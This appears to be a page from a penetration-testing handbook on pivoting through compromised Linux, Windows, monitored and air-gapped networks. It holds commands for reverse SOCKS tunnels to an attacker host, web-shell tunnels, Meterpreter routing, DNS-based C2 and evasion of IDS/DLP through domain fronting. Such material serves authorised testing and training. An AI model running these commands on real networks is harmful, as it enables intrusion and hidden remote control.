Platform-Specific Pivoting Strategies
#Overview
Pivoting strategies depend heavily on the operating systems you encounter and the network monitoring in place. This section provides playbooks for different environments, helping you choose the right tools for each situation.
#Linux-Only Networks
Linux hosts provide the most pivoting options. SSH, iptables, socat, and TUN/TAP interfaces are all available.
#Recommended Tools
| Task | Tool | Why |
|---|---|---|
| SOCKS proxy | SSH -D / Chisel | Fast, encrypted |
| Transparent proxy | SSHuttle / Ligolo-ng | All apps work |
| Port forward | SSH -L/-R / socat / iptables | Many options |
| DNS tunnel | iodine / dnscat2 | Full root access |
| Multi-hop | SSH -J / proxychains | Clean chaining |
#Quick Playbook
# 1. Check egress
curl -s http://ifconfig.me # HTTP
ssh <external_host> # SSH
nslookup <domain> <dns_ip> # DNS
ping -c 1 <external_ip> # ICMP
# 2. If SSH egress exists:
sshuttle -r user@pivot 172.16.0.0/12 --dns
# Or:
ssh -D 1080 user@pivot
# 3. If only HTTP egress:
# Upload Neo-reGeorg tunnel script to web server
python3 neoreg_server -k <password> -u http://target/tunnel.aspx
# 4. If only DNS egress:
sudo iodined -f -c -P pass 10.0.0.1 dnscat2.example.com
# 5. Multi-hop:
ssh -J user@pivot1,user@pivot2 -D 1080 user@target
BASH
#Windows-Only Networks
Windows hosts have fewer native pivoting options. SSH (OpenSSH), netsh, and Plink are the primary tools.
#Recommended Tools
| Task | Tool | Why |
|---|---|---|
| SOCKS proxy | Chisel / Ligolo-ng agent | Single binary, no deps |
| Port forward | netsh portproxy / Plink | Native or lightweight |
| HTTP tunnel | Earthworm / Neo-reGeorg | Binary or web shell |
| Metasploit | autoroute + portfwd | If Meterpreter present |
| DNS tunnel | dnscat2 client | If only DNS egress |
#Quick Playbook
:: 1. Check egress
curl http://ifconfig.me :: HTTP
ssh user@external_host :: SSH
nslookup domain dns_ip :: DNS
ping external_ip :: ICMP
:: 2. If you can upload Chisel:
chisel.exe client <attacker>:8080 R:socks
:: 3. If you have Meterpreter:
meterpreter> run autoroute -s 172.16.0.0/24
meterpreter> portfwd add -l 8080 -p 80 -r 172.16.0.10
:: 4. If you have admin access:
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8080 connectaddress=172.16.0.10 connectport=80
:: 5. If only HTTP egress and no binary upload:
:: Upload Neo-reGeorg ASPX tunnel
python3 neoreg_server -k pass -u http://target/tunnel.aspx
CMD
#Mixed OS Networks
Most real networks have both Linux and Windows. Use tools that work across both or chain between OS types.
#Strategy: Linux Pivot → Windows Target
# 1. Compromise Linux host in DMZ
ssh user@linux-dmz
# 2. Enumerate internal network from Linux
nmap -sn 172.16.0.0/24
# 3. Create SOCKS proxy through Linux pivot
ssh -D 1080 user@linux-dmz
# 4. Access Windows targets through SOCKS
proxychains4 nmap -sT -Pn 172.16.0.20 -p 3389
proxychains4 xfreerdp /v:172.16.0.20 /u:admin
# 5. Compromise Windows target
# Upload chisel.exe to Windows target
chisel.exe client <attacker>:8080 R:socks
# 6. Now you have SOCKS through the Windows target too
# Chaining: attacker → linux-dmz → windows-internal → deeper network
BASH
#Strategy: Windows Pivot → Linux Target
:: 1. Compromise Windows host
:: 2. Start Chisel client for SOCKS
chisel.exe client <attacker>:8080 R:socks
:: 3. Or use netsh for specific port forwards
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=2222 connectaddress=172.16.0.10 connectport=22
:: 4. SSH to Linux targets through the forward
ssh -p 2222 user@<windows-pivot>
CMD
#Heavily Monitored Networks
Networks with IDS/IPS, DLP, and traffic analysis require stealth-focused pivoting.
#Principles
- Blend with normal traffic: Use HTTPS on port 443, DNS on port 53
- Minimize connection count: Fewer long-lived connections > many short ones
- Use legitimate protocols: HTTPS, DNS, ICMP are less suspicious than raw TCP on unusual ports
- Domain fronting: Hide the real C2 destination behind a CDN
- Jitter and timing: Add randomness to beacon intervals
#Recommended Tools
| Tool | Protocol | OPSEC |
|---|---|---|
| Chisel + TLS | HTTPS | Encrypted, custom domain |
| Ligolo-ng | TLS with selfcert | Encrypted, looks like normal TLS |
| Cloudflare Tunnel | HTTPS through CDN | Legitimate CDN traffic |
| dnscat2 | DNS TXT/CNAME | DNS is rarely inspected |
| Neo-reGeorg + HTTPS | HTTPS | Encrypted web tunnel |
| Domain fronting | HTTPS through CDN | Hides real destination |
#Playbook
# 1. Use Chisel with TLS and authentication
chisel server -p 443 --reverse --tlskey /tmp/key.pem --tlscert /tmp/cert.pem --auth user:pass
# 2. Or use Cloudflare Tunnel for C2
cloudflared tunnel run redteam-tunnel
# 3. DNS fallback if HTTPS is monitored
ruby dnscat2.rb c2.example.com --secret=<key>
# 4. Domain fronting for C2 callbacks
# See [Redirectors & Fronting](../c2-infrastructure/redirectors-and-fronting.md)
BASH
#Air-Gapped Networks
Air-gapped networks have no internet connectivity. Pivoting must stay within the internal network.
#Strategy
- Physical access: USB drops, malicious devices (Bash Bunny, Rubber Ducky)
- Dual-homed hosts: Find hosts with connections to both the air-gapped network and an external network
- Wireless bridges: If wireless is available, see 13 - Wireless Pentesting
- Out-of-band channels: Bluetooth, infrared, ultrasound, electromagnetic emanations
#Playbook
# 1. Enumerate for dual-homed hosts
ip addr | grep -E "inet "
ip route
# 2. If you find a host with two interfaces:
# Interface 1: air-gapped network (10.0.0.0/8)
# Interface 2: internet-connected network (192.168.0.0/24)
ssh -D 1080 user@dual-homed-host
# 3. Route air-gapped traffic through the SOCKS proxy
proxychains4 nmap -sn 10.0.0.0/24
# 4. If no dual-homed hosts, look for:
# - Shared storage (NAS, SAN) accessible from both networks
# - Management interfaces (iDRAC, iLO) on a different network
# - Wireless adapters on air-gapped hosts
BASH
#Quick Decision Matrix
What egress is available?
├── SSH → SSH -D / SSHuttle / Chisel
├── HTTP/HTTPS → Neo-reGeorg / Earthworm / Chisel TLS
├── DNS only → dnscat2 / iodine
├── ICMP only → ptunnel-ng / icmpsh
├── None (air-gapped) → Find dual-homed / wireless bridge
└── Cloud egress → Cloudflare Tunnel / ngrok / WireGuard
How many hops?
├── 1 hop → SSH -D / Chisel / Ligolo-ng
├── 2 hops → SSH -J / proxychains
└── 3+ hops → proxychains nested / Chisel relay
What OS is the pivot?
├── Linux → SSH / socat / iptables / SSHuttle
├── Windows → Chisel / netsh / Plink / Meterpreter
└── Both → Chisel (cross-platform binary)
Is the network monitored?
├── Light monitoring → Any tool
├── Heavy monitoring → Chisel TLS / Cloudflare Tunnel / dnscat2
└── Air-gapped → Dual-homed / wireless / physical
TEXT
#Cross-References
- Network Enumeration — Egress and firewall discovery
- Tunnels & Proxies — All tunneling tools
- Port Forwarding — Port forwarding methods
- C2 Infrastructure — C2 setup for monitored networks
- 13 - Wireless Pentesting — Wireless bridges for air-gapped